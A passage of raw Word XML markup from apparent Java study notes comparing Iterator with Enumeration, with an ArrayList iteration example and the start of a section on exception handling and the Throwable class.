      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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terator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it is more flexible and powerful because it supports element removal and iteration through modern collections (like ArrayList, HashMap, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F242FE7" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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terator Example (modern way):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E156DE6" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="6725C8C0" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93506F" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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teratorExamp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1816E44" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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D700C88" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Using ArrayList (modern collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D9179" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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lis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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2C785" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        lis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pple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CF6D4" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        lis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Banana"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C662817" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        lis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Cherry"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361CC49C" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF6EBD" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Using Iterator to iterate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3808E0" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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terator</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iterato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terator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B94666" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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53CEACC4" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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whi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terat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hasNex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AC6C2D4" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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terator</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D20DE" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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C52ED65" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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1E33573" w14:textId="4B26DB5E" w:rsidR="0029511D" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CEC26" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0044231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6F2BC4E">
          <v:rect id="_x0000_i1593" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC50C9" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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to Use Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F5A0F9" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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egacy Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enumeration is mostly used when working with older collections such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vector</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Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A71515" w14:textId="4BCD1D9B" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ew Projects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It is recommended to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Iterator</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for-each loops</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in new projects, as they offer more functionality and are better integrated with modern Java collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0C290" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0044231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92EE682">
          <v:rect id="_x0000_i1594" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394D26B" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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5BBFB5D6" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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numeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface used to iterate over legacy collections (like Vector and Hashtable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9850E" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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has two main methods: hasMoreElements() and nextElement().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72595A0C" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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lacks the ability to remove elements during iteration (unlike Iterator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24798E88" w14:textId="1E3BAC9A" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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terator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has replaced </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in most use cases due to its extended functionality and better support for modern collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD75EA" w14:textId="13895DE8" w:rsidR="00DD2727" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00442310">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="474E08D4">
          <v:rect id="_x0000_i1595" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00DD2727" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD157D" w14:textId="4AEE1B6D" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B13CFA" w:rsidP="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_Toc196307678"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exception Handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w14:paraId="0C325045" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B" w:rsidP="00127D9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C399DC1" w14:textId="1FDED1F6" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc196307679"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="009217B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">xception </w:t>
      </w:r>
      <w:r w:rsidR="009217B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>andling?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="4345E81E" w14:textId="082D6FBE" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is a mechanism that allows a program to deal with unexpected situations (known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) that might otherwise cause it to terminate unexpectedly. It enables the program to continue its execution in a controlled manner, even if an error occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE697E5" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Concepts in Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E1399" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An event that disrupts the normal flow of the program's execution. It is an object that describes an error or abnormal condition in a program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C227B2C" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Throwable Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC0F5D" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All exceptions and errors in Java are subclasses of the Throwable class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22464E76" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>There are two main types of Throwable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3CB917" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
